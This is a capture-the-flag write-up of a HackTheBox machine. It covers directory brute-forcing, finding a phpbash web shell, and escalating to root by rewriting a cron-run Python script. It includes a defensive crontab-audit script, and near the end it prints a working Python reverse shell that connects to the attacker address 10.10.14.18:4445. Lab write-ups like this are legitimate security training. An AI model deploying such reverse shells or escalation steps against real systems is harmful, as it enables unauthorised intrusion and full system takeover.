![f5864aceeefb1e406e4d5b393c89a357.png](68757d919950447c8a2723837615b2b4.png)
### Port Scanning, General Enumeration and Access (Nmap, Gobuster)
Initial scan showed that the only port available is 80 (HTTP).
![bd01656345ddccc0469e64d7205c7abb.png](a79611f0fb504d2c95e48ad41bf64257.png)
![521eab003e68c7b9b8c6a3165dbc004f.png](25a5af46355a4665aff1c3c562a5abbd.png)
Looks like a pretty neat tool, but not a lot to go on.
`gobuster dir -u http://10.10.10.68/ -w /dirs/small.txt -x php`
![d266d9b40f7d37741133d816aff27fa1.png](926805d2c0704027b5127fd161f124f3.png)
`/dev`?
![e5b7c370abcac44325316c5f01353d1b.png](374d569c5b8544ae9d52f43225a8d392.png)
Found the phpbash thing!
![04cfb0c08f8a0ae2506dc5ea7ee84763.png](a0955a0b22924187939aebd235886bb9.png)
![dcd444ca9a402a810ff2c121f584cee2.png](04f9bd6f06fe467fa56f7a7e2cc9c1d8.png)
---
### Privesc (php reverse shell, python, cronjobs)
We can upload files to the `/uploads` directory in the webroot.
![af313696df01e0877c0ea89ed433c427.png](0400838e70144b8eae257ac5820ddad8.png)
Let's get a real shell.
![4fd58a133be0cd2272fdb3ea3535e5cd.png](6a01483f603b47ab839df4876f952621.png)
`python3 -c 'import pty; pty.spawn("/bin/bash")'`
![c7e9f1b1827264ad792abbc841f4f553.png](c483f76f0a054e3fb5bc65db38e5b76d.png)
Easy enough to switch to `scriptmanager`:
`sudo -u scriptmanager /bin/bash`
There's a scripts folder owned by `scriptmanager`.
![1c2c10bf0ecdf6a2801ed07ec302db62.png](f59cdcfdc0884bc8b8fe0f0e38a86c5e.png)
![a54454783a3b57526f0f6f5b93f0c0c9.png](fb017495d2524ecfa59dfe3430afa544.png)
Interesting, the python script is ours but the text file is owned by root?
![e670daa3f4ef1ab447080a2c41002f16.png](5e05db701753482f846bcd7b28e075ed.png)
I see, so the script runs and creates that file.
![cc2964236f7d97d6178a37695e7b97ad.png](3fa0f82b6b8a424dbefdacbf740f2032.png)
Moving the old `test.txt` to `test.txt.bak` and re-running the script, we can see that the new `test.txt` is owned by us. That leads me to believe that something with root privs ran it prior. Maybe a cronjob? Let's test.
![ed04a1a4e3e0ecfeef9462cd91c806b7.png](39b94ffd44b24eb5bb7f06e45aa19ae4.png)
It's back and with root privs!
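The root-owned `test.txt` is the tell: a root cron job is executing a script that lives in a directory owned by an unprivileged user. The following is an added audit example (not from the original write-up) that a defender can run to catch that misconfiguration: it parses `/etc/crontab`-style entries and flags any absolute path in a job's command whose file or parent directory is owned by a third user or is group/world-writable. The crontab text, user table and file ownerships below are constructed to mirror the situation on the box; `fs_lookup` and `pwd_uid` are the adapters you would pass in to audit a live system.

```python
"""Audit system crontab entries for privileged jobs that run user-modifiable files.
Added example, not part of the original write-up."""
import os
import pwd
import stat
from dataclasses import dataclass


@dataclass(frozen=True)
class FileInfo:
    uid: int   # owner
    mode: int  # permission bits only, e.g. 0o644


def parse_system_crontab(text):
    """Return (user, command) pairs from /etc/crontab-style text.
    Handles the five-field schedule, @daily-style shortcuts, comments and VAR=value lines."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split()[0]:
            continue  # environment assignment such as PATH=...
        if line.startswith("@"):
            parts = line.split(None, 2)
            if len(parts) == 3:
                jobs.append((parts[1], parts[2]))
            continue
        parts = line.split(None, 6)
        if len(parts) == 7:
            jobs.append((parts[5], parts[6]))
    return jobs


def referenced_paths(command):
    """Absolute paths mentioned in the command (interpreter and script alike)."""
    return [tok for tok in command.split() if tok.startswith("/")]


def check_path(path, run_as_uid, lookup):
    """Reasons why `path` could be altered by someone other than root or the job's user.
    The parent directory is checked too: write access there lets the file be replaced."""
    reasons = []
    for p in (path, os.path.dirname(path) or "/"):
        info = lookup(p)
        if info is None:
            reasons.append(f"{p}: not found")
            continue
        if info.uid not in (0, run_as_uid):
            reasons.append(f"{p}: owned by uid {info.uid}, not root or uid {run_as_uid}")
        if info.mode & stat.S_IWOTH:
            reasons.append(f"{p}: world-writable")
        elif info.mode & stat.S_IWGRP:
            reasons.append(f"{p}: group-writable")
    return reasons


def audit_crontab(text, uid_of, lookup):
    """Return {command: [reasons]} for every job that references a risky path."""
    findings = {}
    for user, command in parse_system_crontab(text):
        reasons = []
        for path in referenced_paths(command):
            reasons.extend(check_path(path, uid_of(user), lookup))
        if reasons:
            findings[command] = reasons
    return findings


# Adapters for a live system (assumed usage: audit_crontab(open("/etc/crontab").read(), pwd_uid, fs_lookup)).
def fs_lookup(path):
    try:
        st = os.stat(path)
    except OSError:
        return None
    return FileInfo(st.st_uid, stat.S_IMODE(st.st_mode))


def pwd_uid(user):
    return pwd.getpwnam(user).pw_uid


# Constructed sample data modelled on the ownership seen on the box (uid 1001 = scriptmanager).
CONSTRUCTED_CRONTAB = """\
# constructed sample crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root python /scripts/test.py
@daily root /usr/local/bin/backup.sh
"""
CONSTRUCTED_USERS = {"root": 0, "scriptmanager": 1001}
CONSTRUCTED_FS = {
    "/usr/bin": FileInfo(0, 0o755),
    "/usr/bin/python": FileInfo(0, 0o755),
    "/scripts": FileInfo(1001, 0o755),          # directory owned by scriptmanager
    "/scripts/test.py": FileInfo(1001, 0o644),  # script owned by scriptmanager, run by root
    "/usr/local/bin": FileInfo(0, 0o755),
    "/usr/local/bin/backup.sh": FileInfo(0, 0o755),
}


def demo():
    """Run the audit against the constructed data; only the /scripts job should be flagged."""
    return audit_crontab(CONSTRUCTED_CRONTAB, CONSTRUCTED_USERS.__getitem__, CONSTRUCTED_FS.get)


if __name__ == "__main__":
    for command, reasons in demo().items():
        print(command)
        for r in reasons:
            print("  -", r)
```

The fix the audit points at is the usual one: scripts executed by root from cron should be owned by root, sit in a root-owned directory, and not be group- or world-writable, so that no other account can change what root executes every minute.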
Let's give this boring old `test.py` some fangs.
```python
import socket, os, pty

# connect back to the listener on the attacking host
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.14.18", 4445))
# point stdin, stdout and stderr at the socket
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
pty.spawn("/bin/bash")
```
I created the new `test.py` on my machine and transferred it over. Started a listener and...
![7d8618f99e679389e24dacb08142d003.png](b3cf254ad72549119b33e1520bb5ab13.png)
![be41b9c05ca645b4855a45b650ee1279.png](4a95bcc9d69f47838d361634b7e1239a.png)
---
Back to [[HackTheBox Index]]
Tags: #gobuster #htb #cron #python #hackthebox #box_writeups